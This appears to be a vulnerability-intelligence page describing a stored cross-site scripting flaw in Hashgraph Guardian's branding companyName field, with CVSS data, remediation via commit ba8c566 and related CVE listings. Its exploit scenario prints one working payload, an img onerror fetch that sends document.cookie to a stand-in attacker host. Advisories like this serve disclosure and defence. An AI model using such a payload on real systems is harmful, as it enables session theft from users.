Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Requires STANDARD_REGISTRY role (PR:H); stored payload auto-executes on victim page load (UI:R); scope changes to victims' browsers (S:C); low confidentiality and integrity impact consistent with XSS session exposure.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
Hashgraph Guardian through 3.5.0, fixed in commit ba8c566, contains a stored cross-site scripting vulnerability that allows authenticated users with the STANDARD_REGISTRY role to inject malicious scripts by submitting a crafted companyName value via the branding configuration API endpoint. Attackers can exploit the unsanitized innerHTML assignment in the branding service to execute arbitrary JavaScript in the browser of every authenticated user on every page load.
AnalysisAI
Stored cross-site scripting in Hashgraph Guardian through 3.5.0 allows an authenticated user holding the STANDARD_REGISTRY role to inject persistent JavaScript payloads into the branding configuration's companyName field via the branding API endpoint. The injected script executes in every authenticated user's browser on every page load due to unsanitized innerHTML assignments in both the BrandingService and BrandingComponent Angular classes. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold the STANDARD_REGISTRY role within the Guardian application - a defined named role with authority over branding configuration, distinct from the administrator role. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 4.8 with vector AV:N/AC:L/AT:N/PR:H/UI:P accurately represents the real-world risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker authenticated with the STANDARD_REGISTRY role submits a crafted companyName value such as `<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>` via the Guardian branding configuration API. The payload is stored server-side; on every subsequent page load by any authenticated Guardian user, the Angular BrandingService renders the value via innerHTML, triggering the injected code and silently exfiltrating session cookies or tokens to an attacker-controlled endpoint. … |
| Remediation | The primary fix is to apply commit ba8c566807848cf84360716438056d8d8d2c8362 (GitHub PR #6190), which replaces all three unsafe innerHTML assignments with textContent in branding.service.ts and branding.component.ts. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Nozomi Networks OS before 19.0.4 allows /#/network?tab=network_node_list.html CSV Injection. Rated high severity (CVSS 7
Nozomi Guardian before 19.0.4 allows attackers to achieve stored XSS (in the web front end) by leveraging the ability to
A SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain fields us
Disk-exhaustion denial of service in Nozomi Networks Guardian and Central Management Console (CMC) lets a remote, unauth
Authenticated Standard Registry users can execute arbitrary Node.js code in Hashgraph Guardian ≤3.5.0 through unsandboxe
A SQL Injection vulnerability has been found in Nozomi Networks Guardian and CMC, due to improper input validation in ce
A blind SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in the alerts_
A blind SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in the sorting
Improper Input Validation vulnerability in project file upload in Nozomi Networks Guardian and CMC allows an authenticat
Improper Input Validation vulnerability in custom report logo upload in Nozomi Networks Guardian, and CMC allows an auth
Path Traversal vulnerability when changing timezone using web GUI of Nozomi Networks Guardian, CMC allows an authenticat
OS Command Injection vulnerability when changing date settings or hostname using web GUI of Nozomi Networks Guardian and
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37952
GHSA-jqx7-93j3-2xqf